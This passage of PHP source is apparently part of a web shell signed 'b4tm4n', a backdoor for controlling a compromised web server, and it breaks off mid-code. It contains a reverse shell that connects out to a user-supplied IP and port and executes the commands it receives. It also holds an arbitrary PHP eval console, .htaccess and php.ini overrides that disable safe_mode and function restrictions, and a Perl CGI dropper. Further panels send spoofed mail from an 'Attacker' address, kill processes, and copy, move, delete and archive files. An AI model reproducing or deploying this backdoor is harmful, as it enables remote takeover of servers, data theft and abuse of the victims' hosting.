if(\$_REQUEST['socket']==\"stream_socket_client\")\r\n\t\t\t{\r\n\t\t\t\t\$host=\$_REQUEST['reverse-ip'];\r\n\t\t\t\t\$port=\$_REQUEST['reverse-port'];\r\n\t\t\t\t\$sock=@stream_socket_client(\"tcp://\$host:\$port\",\$errno,\$errstr);\r\n\t\t\t\tif (!\$sock) \r\n\t\t\t\t{ \r\n\t\t\t\t printf(\"<font color='red'><b>%s</b>:%s</font>\",\$errno,\$errstr);\r\n\t\t\t\t}\r\n\t\t\t\telse \r\n\t\t\t\t{ \r\n\t\t\t\t\twhile(!feof(\$sock)) \r\n\t\t\t\t { \r\n\t\t\t\t \tfwrite(\$sock,\"[b4tm4n]:\");\r\n\t\t\t\t \$command=fgets(\$sock,1024);\r\n\t\t\t\t if(trim(\$command)=='quit'||trim(\$command)=='exit')\r\n\t\t\t\t\t {\r\n\t\t\t\t\t \tfclose(\$sock);\r\n\t\t\t\t\t \tprintf(\$command);\r\n\t\t\t\t\t \texit;\r\n\t\t\t\t\t }\r\n\t\t\t\t fwrite(\$sock,Execute(\$command));\r\n\t\t\t\t }\r\n\t\t\t\t fclose(\$sock);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t\tprintf(\"</fieldset></div></div></div></div>\");\r\n\t}\r\n\tif(\$_REQUEST['x']==\"htaccess\")\r\n\t{\r\n\t\t\$php_ini=array(\r\n\t\t\t\"php_value upload_max_filesize 32M\",\r\n\t\t\t\"php_value post_max_size 32M\",\r\n\t\t\t\"php_flag safe_mode Off\",\r\n\t\t\t\"php_value disable_functions null\",\r\n\t\t\t\"php_flag safe_mode_gid Off\",\r\n\t\t\t\"php_value open_basedir \$dir\",\r\n\t\t\t\"php_flag register_globals On\",\r\n\t\t\t\"php_flag exec On\",\r\n\t\t\t\"php_flag shell_exec On\");\r\n\r\n\t\t\$htaccess=array(\r\n\t\t\t\"Options All\",\r\n\t\t\t\"Allow From All\",\r\n\t\t\t\"Satisfy Any\");\r\n\r\n\t\tprintf(\"\r\n\t\t\t<div class='divide'>\r\n\t\t\t\t<div class='divide-left'>\r\n\t\t\t\t\t<textarea>%s</textarea>\r\n\t\t\t\t</div>\r\n\t\t\t\t<div class='divide-right'>\r\n\t\t\t\t\t<textarea>%s</textarea>\r\n\t\t\t\t</div>\r\n\t\t\t</div>\",implode(\$php_ini,\"\\n\"),implode(\$htaccess,\"\\n\"));\r\n\t}\r\n\tif(\$_REQUEST['x']==\"php\")\r\n\t{\t\r\n\t\t\$exp=array(\r\n\t\t\t\"print_r(get_extension_funcs('Core'));\",\r\n\t\t\t\"print_r(get_loaded_extensions());\",\r\n\t\t\t\"print_r(ini_get_all('pcre'));\",\r\n\t\t\t\"print_r(ini_get_all());\",\r\n\t\t\t\"print_r(get_defined_constants());\",\r\n\t\t\t\"print_r(get_defined_functions());\",\r\n\t\t\t\"print_r(get_declared_classes());\");\r\n\t\t\r\n\t\tprintf(\"<div id='php'>\r\n\t\t\t\t\t<form onsubmit='return false;'>\r\n\t\t\t\t\t\t<div class='php-left'>\r\n\t\t\t\t\t\t\t<textarea id='php-code' cols='122' rows='20'>%s</textarea>\r\n\t\t\t\t\t\t</div>\r\n\t\t\t\t\t\t<div class='php-right'>\r\n\t\t\t\t\t\t\t<textarea id='php-eval' cols='122' rows='20' readonly></textarea>\r\n\t\t\t\t\t\t</div>\r\n\t\t\t\t\t\t<input type='submit' id='php-submit' onclick=\\\"getAjax(false,'php-eval','POST','?x=php&codex='+document.getElementById('php-code').value);\\\" class='php-code' name=php-code cols=122 rows=20 value='Inject'/>\r\n\t\t\t\t\t\t<input type='submit' id='php-submit' onclick=\\\"getAjax(false,'php-eval','POST','?x=php&code='+document.getElementById('php-code').value);\\\" class='php-code' name=php-code cols=122 rows=20 value='Run'/>\r\n\t\t\t\t\t</form>\r\n\t\t\t\t</div>\",implode(\$exp,\"\\n\"));\r\n\r\n\t\tif(any(\"code\",\$_REQUEST))\r\n\t\t{\r\n\t\t\tob_clean();\r\n\t\t\t\$code=trim(\$_REQUEST['code']);\r\n\t\t\t\$evil=Evil(\$code);\r\n\t\t\texit;\r\n\t\t}\r\n\t\tif(any(\"codex\",\$_REQUEST))\r\n\t\t{\r\n\t\t\tob_clean();\r\n\t\t\t\$code=trim(\$_REQUEST['codex']);\r\n\t\t\t\$evil=Evil(\$code,true);\r\n\t\t\texit;\r\n\t\t}\r\n\t}\r\n\tif(\$_REQUEST['x']==\"perl\")\r\n\t{\r\n\t\tprint 'PHP Perl Class: '.(class_exists('Perl')?\"<b class='on'>ON</b>\":\"<b class='off'>OFF</b>\").'<br>';\r\n\r\n\t\tif(Unix())\r\n\t\t{\r\n\t\t\tif(file_exists(\"/usr/bin/perl\"))\r\n\t\t\t{\r\n\t\t\t\t\$path_perl=\"/usr/bin/perl\";\r\n\t\t\t}\r\n\t\t\telse\r\n\t\t\t{\r\n\t\t\t\t\$path_perl=\"/usr/bin/env perl\";\r\n\t\t\t}\r\n\t\t}\r\n\t\telse\r\n\t\t{\r\n\t\t\tif(file_exists(\"C:\\\\perl\\bin\\perl.exe\"))\r\n\t\t\t{\r\n\t\t\t\t\$path_perl=\"C:\\\\perl\\bin\\perl.exe\";\r\n\t\t\t}\r\n\t\t\telseif(file_exists(\"C:\\\\wamp\\bin\\perl.exe\"))\r\n\t\t\t{\r\n\t\t\t\t\$path_perl=\"C:\\\\wamp\\bin\\perl.exe\";\r\n\t\t\t}\r\n\t\t\telseif(file_exists(\"C:\\\\xampp\\perl\\bin\\perl.exe\"))\r\n\t\t\t{\r\n\t\t\t\t\$path_perl=\"C:\\\\xampp\\perl\\bin\\perl.exe\";\r\n\t\t\t}\r\n\t\t}\r\n\t\t\r\n\t\t\$script=array(\r\n\t\t\t\"#!\$path_perl\",\r\n\t\t\t\"use strict;\",\r\n\t\t\t\"use warnings;\",\r\n\t\t\t\"use CGI;\",\r\n\t\t\t\"print CGI::header();\",\r\n\t\t\t\"print 'k4mpr3t on CGI';\");\r\n\r\n\t\t\$htaccess=array(\r\n\t\t\t\"Options +ExecCGI +SymLinksIfOwnerMatch\",\r\n\t\t\t\"DirectoryIndex index.ler\",\r\n\t\t\t\"AddType application/x-httpd-cgi .ler\",\r\n\t\t\t\"AddHandler cgi-script .ler\");\r\n\r\n\t\t\$path=\$dir._.'cgi-bin';\r\n\t\t\$file=\$path._.'perl.ler';\r\n\t\t\$file2=\$path._.'.htaccess';\r\n\r\n\t\t\$scripts=implode(\$script,\"\\n\");\r\n\t\t\$htaccesss=implode(\$htaccess,\"\\n\");\r\n\r\n\t\tif(!is_dir(\$path))\r\n\t\t{\r\n\t\t\tmkdir(\$path,0755);\r\n\t\t}\r\n\t\tif(!is_file(\$file))\r\n\t\t{\r\n\t\t\t\$op=fopen(\$file,'w+');\r\n\t\t\tfwrite(\$op,\$scripts);\r\n\t\t\tfclose(\$op);\r\n\t\t\tchmod(\$file,0755);\r\n\t\t}\r\n\t\tif(!is_file(\$file2))\r\n\t\t{\r\n\t\t\t\$op=fopen(\$file2,'w+');\r\n\t\t\tfwrite(\$op,\$htaccesss);\r\n\t\t\tfclose(\$op);\r\n\t\t\tchmod(\$file2,0755);\r\n\t\t}\r\n\r\n\t\t\$redirect=GetUrlFromPath(\$file);\r\n\t\tprintf(\"Tested -> <a href='\$redirect' target='_blank'><u>Link</u></a>\");\r\n\t\t\r\n\t\tif (class_exists('Perl'))\r\n\t\t{\r\n\t\t\t//\$perl=Perl::getInstance();\r\n\t\t\t\$perl=new Perl();\r\n\t\t\t\$perl->eval(\"print \\\"Executing Perl code in PHP\\n\\\"\");\r\n\t\t\tprint \"Hello from PHP! \";\r\n\r\n\t\t\t//\$perl=new Perl();\r\n\t\t\t\$perl->require(\$file);\r\n\t\t\t\$val=\$perl->somePhpFunc('test');\r\n\t\t\tprint \$val;\r\n\t\t}\r\n\t}\r\n\tif(\$_REQUEST['x']==\"mail\")\r\n\t{\r\n\t\tprintf(\"\r\n\r\n\t\t\t<div class='divide'>\r\n\t\t\t\t<div class='divide-left'>\r\n\t\t\t\t\t<fieldset>\r\n\t\t\t\t\t\t<legend>Mail</legend>\r\n\t\t\t\t\t\t<form onsubmit='return false;' class='mail'>\r\n\t\t\t\t\t\t\t<label>From</label><input type='text' id='email-from' placeholder='Attacker <very@handsome.com>' value='Attacker <very@handsome.com>'/><br>\r\n\t\t\t\t\t\t\t<label>Reply To</label><input type='text' id='email-reply' placeholder=very@handsome.com' value='very@handsome.com'/><br>\r\n\t\t\t\t\t\t\t<label>To</label><input type='text' id='email-to' placeholder='Target 1 <target1@target.com>,Target 2 <target2@target.com>' value=''/><br>\r\n\t\t\t\t\t\t\t<label>Cc</label><input type='text' id='email-cc' placeholder='target1@target.com,target2@target.com' value=''/><br>\r\n\t\t\t\t\t\t\t<label>Bcc</label><input type='text' id='email-bcc' placeholder='target1@target.com,target2@target.com' value=''/><br>\r\n\t\t\t\t\t\t\t<label>Subject</label><input type='text' id='email-subject' placeholder='What You Waiting For ?' value=''/><br>\r\n\t\t\t\t\t\t\t<label>Attachment (FIlename)</label><input type='text' id='email-attachment' placeholder='%s' value=''/><br>\r\n\t\t\t\t\t\t\t<label>Messages</label><input type='text' id='email-message'/><br>\r\n\t\t\t\t\t\t\t<input type='submit' value='Send' onclick=\\\"\r\n\r\n\t\t\t\t\t\t\t\tgetAjax(true,\r\n\t\t\t\t\t\t\t\t\t'send-result',\r\n\t\t\t\t\t\t\t\t\t'POST',\r\n\t\t\t\t\t\t\t\t\t'?x=mail&xa=send'+\r\n\t\t\t\t\t\t\t\t\t'&from='+document.getElementById('email-from').value+\r\n\t\t\t\t\t\t\t\t\t'&reply='+document.getElementById('email-reply').value+\r\n\t\t\t\t\t\t\t\t\t'&to='+document.getElementById('email-to').value+\r\n\t\t\t\t\t\t\t\t\t'&cc='+document.getElementById('email-cc').value+\r\n\t\t\t\t\t\t\t\t\t'&bcc='+document.getElementById('email-bcc').value+\r\n\t\t\t\t\t\t\t\t\t'&subject='+document.getElementById('email-subject').value+\r\n\t\t\t\t\t\t\t\t\t'&message='+document.getElementById('email-message').value+\r\n\t\t\t\t\t\t\t\t\t'&attachment='+document.getElementById('email-attachment').value);\r\n\r\n\t\t\t\t\t\t\t\\\"/>\t\r\n\t\t\t\t\t\t</form>\r\n\t\t\t\t\t</fieldset>\r\n\t\t\t\t</div>\r\n\t\t\t\t<div class='divide-right'>\r\n\t\t\t\t\t<fieldset>\r\n\t\t\t\t\t\t<legend>Result's</legend>\r\n\t\t\t\t\t\t<div id='send-result'></div>\r\n\t\t\t\t\t</fieldset>\r\n\t\t\t\t</div>\r\n\t\t\t</div>\r\n\r\n\t\t\",php_self);\r\n\r\n\t\tif(any('xa',\$_REQUEST)&&\$_REQUEST['xa']=='send')\r\n\t\t{\r\n\t\t\tob_clean();\r\n\t\t\t\$from=\$_REQUEST['from'];\r\n\t\t\t\$reply=\$_REQUEST['reply'];\r\n\t\t\t\$to=\$_REQUEST['to'];\r\n\t\t\t\$cc=\$_REQUEST['cc'];\r\n\t\t\t\$bcc=\$_REQUEST['bcc'];\r\n\t\t\t\$subject=\$_REQUEST['subject'];\r\n\t\t\t\$msg=\$_REQUEST['message'];\r\n\t\t\t\$attachment=\$_REQUEST['attachment'];\r\n\t\t\t\$uid=md5(uniqid(time()));\r\n\r\n\t\t\t\$headers[]=\"From: \$from\";\r\n\t\t\t\$headers[]=\"Reply-To: \$reply\";\r\n\t\t\t\$headers[]=\"To: \$to\";\r\n\t\t\tif(!empty(\$cc)) \$headers[]='Cc: \$cc';\r\n\t\t\tif(!empty(\$bcc)) \$headers[]='Bcc: \$bcc';\r\n\t\t\t\$headers[]=\"MIME-Version: 1.0\";\r\n\t\t\t\$headers[]=\"Content-Type: multipart/mixed; boundary=\\\"\$uid\\\"\";\r\n\r\n\t\t\t\$messages[]=\"--\$uid\";\r\n\t\t \$messages[]=\"Content-type: text/html; charset=\\\"iso-8859-1\\\"\";\r\n\t\t \$messages[]=\"Content-Transfer-Encoding: 8bit\";\r\n\t\t \$messages[]=\"\";\r\n\t\t \$messages[]=\"\$msg\";\r\n\t\t \$messages[]=\"\";\r\n\r\n\t\t\tif(is_file(\$attachment))\r\n\t\t\t{\r\n\t\t\t\t\$content=file_get_contents(\$attachment);\r\n\t\t\t\t\$content=chunk_split(B64E(\$content));\r\n\t\t\t\t\$name=basename(\$attachment);\r\n\t\t\t\t\$mime=mime_content_type(\$attachment);\r\n\r\n\t\t\t\t\$messages[]=\"--\$uid\";\r\n\t\t\t \$messages[]=\"Content-Type: \$mime; name=\\\"\$name\\\"\";\r\n\t\t\t \$messages[]=\"Content-Transfer-Encoding: base64\";\r\n\t\t\t \$messages[]=\"Content-Disposition: attachment\";\r\n\t\t\t \$messages[]=\"\";\r\n\t\t\t \$messages[]=\"\$content\";\r\n\t\t\t \$messages[]=\"\";\r\n\t\t\t \$messages[]=\"--\$uid--\";\r\n\t\t\t}\r\n\r\n\t\t\t\$message=implode(\"\\r\\n\",\$messages);\r\n\t\t\t\$header=implode(\"\\r\\n\",\$headers);\r\n\r\n\t\t\tif(mail(\$to,\$subject,\$message,\$header))\r\n\t\t\t{\r\n\t\t\t\tprint \"Email Send\";\r\n\t\t\t}\r\n\t\t\telse \r\n\t\t\t{\r\n\t\t\t\t\$error=error_get_last();\r\n\t\t\t\tprint \"Error :\" . \$error['message'];\r\n\t\t\t}\r\n\t\t\texit;\r\n\t\t}\r\n\t}\r\n\tif(\$_REQUEST['x']=='process')\r\n\t{\r\n\t\tprintf(\"<div id='process-kill'><form class='new' method='post' action='?x=process&xa=kill'>\r\n\t\t\t\t\t<label>PID</label> <input type='text' name='pid'/>\r\n\t\t\t\t\t<input type='submit' value='Kill'/><br>\r\n\t\t\t\t\t<label>Name</label> <input type='text' name='name'/>\r\n\t\t\t\t\t<input type='submit' value='Kill'/>\r\n\t\t\t\t</form></div>\");\r\n\r\n\t\tif(any(\"xa\",\$_REQUEST)&&\$_REQUEST['xa']==\"kill\")\r\n\t\t{\r\n\t\t\t\$pid=\$_REQUEST['pid'];\r\n\t\t\t\$name=\$_REQUEST['name'];\r\n\r\n\t\t\tif(Unix())\r\n\t\t\t{\r\n\t\t\t\t\$kill=Execute(\"kill 9 \$pid\");\r\n\t\t\t\t\$kill=Execute(\"kill 9 \$name\");\r\n\t\t\t\tif(\$kill) print '<font class=\"off\">Process Killed</font>';\r\n\t\t\t}\r\n\t\t\telse\r\n\t\t\t{\r\n\t\t\t\t\$kill=Execute(\"taskkill /f /pid \$pid\");\r\n\t\t\t\t\$kill=Execute(\"taskkill /f /im \$name\");\r\n\t\t\t\tif(\$kill) print '<font class=\"off\">Process Killed</font>';\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\tif(Unix())\r\n\t\t{\r\n\t\t\t\$ret=iconv('UTF-8','UTF-8',Execute('ps aux'));\r\n\t\t\tprint '<div id=\"process-list\"><pre>'.\$ret.'</pre></div>';\r\n\t\t}\r\n\t\telse\r\n\t\t{\r\n\t\t\t\$ret=iconv('Windows-1251','UTF-8',Execute('tasklist'));\r\n\t\t\tprint '<div id=\"process-list\"><pre>'.\$ret.'</pre></div>';\r\n\t\t}\r\n\t}\r\n\tif(\$_REQUEST['x']=='shells')\r\n\t{\r\n\t\tprint \"Coming Soon\";\r\n\t}\r\n\tif(\$_REQUEST['x']=='symlink')\r\n\t{\r\n\t\tprint \"Coming Soon\";\r\n\t}\r\n\tif(\$_REQUEST['x']==\"account\")\r\n\t{\r\n\t\tprintf(\"<div id='account'><form class='new' method='post' action='?x=account&xa=change'>\r\n\t\t\t\t\t<label>Username</label> <input type='text' name='change-username' autocomplete='off' value='%s'/> <br>\r\n\t\t\t\t\t<label>Password</label> <input type='text' name='change-password' autocomplete='off'value=''/><br>\r\n\t\t\t\t\t<input type='submit' value='Change' onclick=\\\"return confirm('Sure ?');\\\"/>\r\n\t\t\t\t</form></div>\",B64D(\$account[0]));\r\n\r\n\t\tif(any(\"xa\",\$_REQUEST)&&\$_REQUEST['xa']==\"change\")\r\n\t\t{\r\n\t\t\t\$filename=script_filename;\r\n\t\t\t\$username=\$_REQUEST['change-password'];\r\n\t\t\t\$password=\$_REQUEST['change-username'];\r\n\r\n\t\t\tif (!empty(\$username)&&!empty(\$password))\r\n\t\t\t{\r\n\t\t\t\t\$user_from=\$account[0];\r\n\t\t\t\t\$user_to=B64E(\$password);\r\n\t\t\t\t\$content=file_get_contents(\$filename);\r\n\t\t\t\t\$chunk=explode(\$user_from,\$content);\r\n\t\t\t\t\$content=implode(\$user_to,\$chunk);\r\n\t\t\t\t\$change=file_put_contents(\$filename,\$content);\r\n\r\n\t\t\t\t\$pass_from=\$account[1];\r\n\t\t\t\t\$pass_to=sha1(md5(\$username));\r\n\t\t\t\t\$content=file_get_contents(\$filename);\r\n\t\t\t\t\$chunk=explode(\$pass_from,\$content);\r\n\t\t\t\t\$content=implode(\$pass_to,\$chunk);\r\n\t\t\t\t\$change=file_put_contents(\$filename,\$content);\r\n\r\n\t\t\t\tif(\$change)\r\n\t\t\t\t{\r\n\t\t\t\t\tsession_destroy();\r\n\t\t\t\t\tsession_regenerate_id();\r\n\t\t\t\t\theader('location:'.php_self);\r\n\t\t\t\t}\r\n\t\t\t\telse\r\n\t\t\t\t{\r\n\t\t\t\t\tprintf(\"Error change account\");\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\telse\r\n\t\t\t{\r\n\t\t\t\tprintf(\"<b class='off'>Mistakes !</b>\");\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\tif(\$_REQUEST['x']==\"action\")\r\n\t{\r\n\t\t\$files=any('chk',\$_REQUEST)?\$_REQUEST['chk']:array();\r\n\t\t\$value=any('action-value',\$_REQUEST)?\$_REQUEST['action-value']:\$_REQUEST['action-option'];\r\n\t\t\$tmp=\"\";\r\n\t\t\$row=\"\";\r\n\t\t\$count_dirs=0;\r\n\t\t\$count_files=0;\r\n\t\t\r\n\t\tforeach(\$files as \$file)\r\n\t\t{\r\n\t\t\tif(is_dir(urld(\$file)))\r\n\t\t\t{\r\n\t\t\t\t\$count_dirs++;\r\n\t\t\t}\r\n\t\t\tif(is_file(urld(\$file)))\r\n\t\t\t{\r\n\t\t\t\t\$count_files++;\r\n\t\t\t}\r\n\r\n\t\t\t\$row.=\"<tr><td>\".urld(\$file).\"</td></tr>\";\r\n\t\t\t\$tmp.=urld(\$file).\",\";\r\n\t\t}\r\n\r\n\t\tif(count(\$files)==1&&\$value=='copy')\r\n\t\t{\r\n\t\t\theader('location:'.php_self.'?a=cp&r='.\$files[0]);\r\n\t\t}\r\n\r\n\t\tif(count(\$files)==1&&\$value=='move')\r\n\t\t{\r\n\t\t\theader('location:'.php_self.'?a=mv&r='.\$files[0]);\r\n\t\t}\r\n\r\n\t\tif(!any('xa',\$_REQUEST)&&\$value=='delete')\r\n\t\t{\r\n\t\t\tprintf(\"<h4>Dir's: [%s] File's: [%s]</h4>\r\n\t\t\t\t\t<table class='table'>%s</table>\r\n\t\t\t\t\t<form class='new' method='post' action='?x=action&xa=option'>\r\n\t\t\t\t\t\t<input type='hidden' name='action-option' value='%s'/>\r\n\t\t\t\t\t\t<input type='hidden' name='tmp' value='%s'/>\r\n\t\t\t\t\t\t<input type='submit' value='Remove'/>\r\n\t\t\t\t\t</form>\",\r\n\t\t\t\t\t\$count_dirs,\r\n\t\t\t\t\t\$count_files,\r\n\t\t\t\t\t\$row,\r\n\t\t\t\t\t\$value,\r\n\t\t\t\t\t\$tmp);\r\n\t\t}\r\n\r\n\t\tif(!any('xa',\$_REQUEST)&&\$value!='delete')\r\n\t\t{\r\n\t\t\tprintf(\"<h4>Dir's: [%s] File's: [%s]</h4>\r\n\t\t\t\t\t<table class='table'>%s</table>\r\n\t\t\t\t\t<form class='new' method='post' action='?x=action&xa=option'>\r\n\t\t\t\t\t\t<script>window.onload=function(e){document.getElementById('action_option').value='%s'}</script>\r\n\t\t\t\t\t\t<select name='action-option' id='action_option'>\r\n\t\t\t\t\t\t\t<option value='copy'>Copy</option>\r\n\t\t\t\t\t\t\t<option value='move'>Move</option>\r\n\t\t\t\t\t\t\t<option value='zip'>Archive (zip)</option>\r\n\t\t\t\t\t\t\t<option value='unzip'>Extract to (zip)</option>\r\n\t\t\t\t\t\t</select>\r\n\t\t\t\t\t\t<i>-></i>\r\n\t\t\t\t\t\t<input type='hidden' name='tmp' value='%s'/>\r\n\t\t\t\t\t\t<input type='text' name='newloc' value='%s'/>\r\n\t\t\t\t\t\t<input type='submit' value='Process'/>\r\n\t\t\t\t\t</form>\",\r\n\t\t\t\t\t\$count_dirs,\r\n\t\t\t\t\t\$count_files,\r\n\t\t\t\t\t\$row,\r\n\t\t\t\t\t\$value,\r\n\t\t\t\t\t\$tmp,\r\n\t\t\t\t\t\$dir._);\r\n\t\t}\r\n\r\n\t\tif(any('xa',\$_REQUEST)&&\$_REQUEST['xa']=='option')\r\n\t\t{\r\n\t\t\t\$files=array_filter(explode(',',\$_REQUEST['tmp']));\r\n\t\t\t\$newloc=trim(@\$_REQUEST['newloc']);\r\n\t\t\t\$succ=0;\r\n\t\t\t\$fail=0;\r\n\r\n\t\t\tif(\$_REQUEST['action-option']=='copy')\r\n\t\t\t{\r\n\t\t\t\tif(file_exists(\$newloc)&&is_dir(\$newloc))\r\n\t\t\t\t{\r\n\t\t\t\t\tforeach(\$files as \$file)\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tif(CopyRecursive(\$file,rtrim(\$newloc,_)._.basename(\$file)))\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\$succ++;\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\telse\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\$fail++;\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t\tprint \"Success: \$succ | Failed: \$fail\";\r\n\t\t\t\t}\r\n\t\t\t\telse\r\n\t\t\t\t{\r\n\t\t\t\t\tprint \"Target not exists !\";\r\n\t\t\t\t}\r\n\t\t\t}\r\n\r\n\t\t\tif(\$_REQUEST['action-option']=='move')\r\n\t\t\t{\r\n\t\t\t\tif(file_exists(\$newloc)&&is_dir(\$newloc))\r\n\t\t\t\t{\r\n\t\t\t\t\tforeach(\$files as \$file)\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tif(MoveRecursive(\$file,rtrim(\$newloc,_)._.basename(\$file)))\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\$succ++;\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\telse\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\$fail++;\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t\tprint \"Success: \$succ | Failed: \$fail\";\r\n\t\t\t\t}\r\n\t\t\t\telse\r\n\t\t\t\t{\r\n\t\t\t\t\tprint \"Target not exists !\";\r\n\t\t\t\t}\r\n\t\t\t}\r\n\r\n\t\t\tif(\$_REQUEST['action-option']=='delete')\r\n\t\t\t{\r\n\t\t\t\tforeach(\$files as \$file)\r\n\t\t\t\t{\r\n\t\t\t\t\tif(Remove(\$file))\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\t\$succ++;\r\n\t\t\t\t\t}\r\n\t\t\t\t\telse\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\t\$fail++;\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t\tprint \"Success: \$succ | Failed: \$fail\";\r\n\t\t\t}\r\n\r\n\t\t\tif(\$_REQUEST['action-option']=='zip')\r\n\t\t\t{\r\n\t\t\t\tif(pathinfo(\$newloc)['extension']=='zip')\r\n\t\t\t\t{\r\n\t\t\t\t\t\$zip=new ZipArchive;\r\n\r\n\t\t\t\t\tif (\$zip->open(\$newloc,ZipArchive::CREATE|ZipArchive::OVERWRITE)===TRUE) \r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tforeach(\$files as \$file)\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\tif(is_dir(\$file))\r\n\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\$zip->addEmptyDir(basename(\$file));\r\n\r\n\t\t\t\t\t\t\t\t\$recur=new RecursiveIteratorIterator(\r\n\t\t\t\t\t\t\t\t new RecursiveDirectoryIterator(\$file),\r\n\t\t\t\t\t\t\t\t RecursiveIteratorIterator::LEAVES_ONLY \r\n\t\t\t\t\t\t\t\t);\r\n\r\n\t\t\t\t\t\t\t\tforeach (\$recur as \$key => \$val) \r\n\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t if(basename(\$key)!=\"..\")\r\n\t\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t if(is_dir(\$key))\r\n\t\t\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t\t\t\$zdir=str_replace(\$file,basename(\$file),realpath(\$key));\r\n\t\t\t\t\t\t\t\t\t\t\t\$zip->addEmptyDir(\$zdir);\r\n\t\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\t\t\telseif(is_file(\$key))\r\n\t\t\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t\t\t\$zfile=str_replace(\$file,basename(\$file),realpath(\$key));\r\n\t\t\t\t\t\t\t\t\t\t\t\$zip->addFile(realpath(\$key),\$zfile);\r\n\t\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\telseif(is_file(\$file))\r\n\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\$zip->addFile(\$file,basename(\$file));\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\r\n\t\t\t\t\t \$zip->close();\r\n\t\t\t\t\t print 'Zip Created';\r\n\t\t\t\t\t}\r\n\t\t\t\t\telse \r\n\t\t\t\t\t{\r\n\t\t\t\t\t print 'Failed';\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t\telse\r\n\t\t\t\t{\r\n\t\t\t\t\tprint 'Extension must Zip';\r\n\t\t\t\t}\r\n\t\t\t}\r\n\r\n\t\t\tif(\$_REQUEST['action-option']=='unzip')\r\n\t\t\t{\r\n\t\t\t\tif(file_exists(\$newloc)&&is_dir(\$newloc))\r\n\t\t\t\t{\r\n\t\t\t\t\tforeach(\$files as \$file)\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tif(pathinfo(\$newloc)['extension']=='zip')\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\$zip=new ZipArchive;\r\n\t\t\t\t\t\r\n\t\t\t\t\t\t\tif (\$zip->open(\$file)===TRUE) \r\n\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t \$zip->extractTo(\$newloc);\r\n\t\t\t\t\t\t\t \$zip->close();\r\n\t\t\t\t\t\t\t \$succ++;\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\telse \r\n\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t \$fail++;\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\telse \r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t \$fail++;\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t}\r\n\t\t\t\t\tprint \"Success: \$succ | Failed: \$fail\";\r\n\t\t\t\t}\r\n\t\t\t\telse\r\n\t\t\t\t{\r\n\t\t\t\t\tprint \"Target not exists !\";\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\tif(\$_REQUEST['x']==\"find\")\r\n\t{\r\n\t\t\$recur=new RecursiveIteratorIterator(\r\n\t\t new RecursiveDirectoryIterator(\$dir),\r\n\t\t RecursiveIteratorIterator::LEAVES_ONLY \r\n\t\t);\r\n\r\n\t\tif(any('find-value',\$_REQUEST)&&!empty(\$_REQUEST['find-value']))\r\n\t\t{\r\n\t\t\t\$result=\"\";\r\n\t\t\t\$res_=0;\r\n\r\n\t\t\tforeach (\$recur as \$key => \$val) \r\n\t\t\t{\r\n\t\t\t\tif(basename(\$key)!=\"..\")\r\n\t\t\t\t{\r\n\t\t\t\t\tif(strpos(realpath(\$key),\$_REQUEST['find-value'])!== false) \r\n\t\t\t\t\t{\r\n\t\t\t\t\t\t\$result.=sprintf(\"<tr>\r\n\t\t\t\t\t\t\t\t<td></td>\r\n\t\t\t\t\t\t\t\t<td><a href='?g=%s' title='%s' target='_blank'>%s</a></td>\r\n\t\t\t\t\t\t\t\t<td><a href='?g=%s' title='%s' 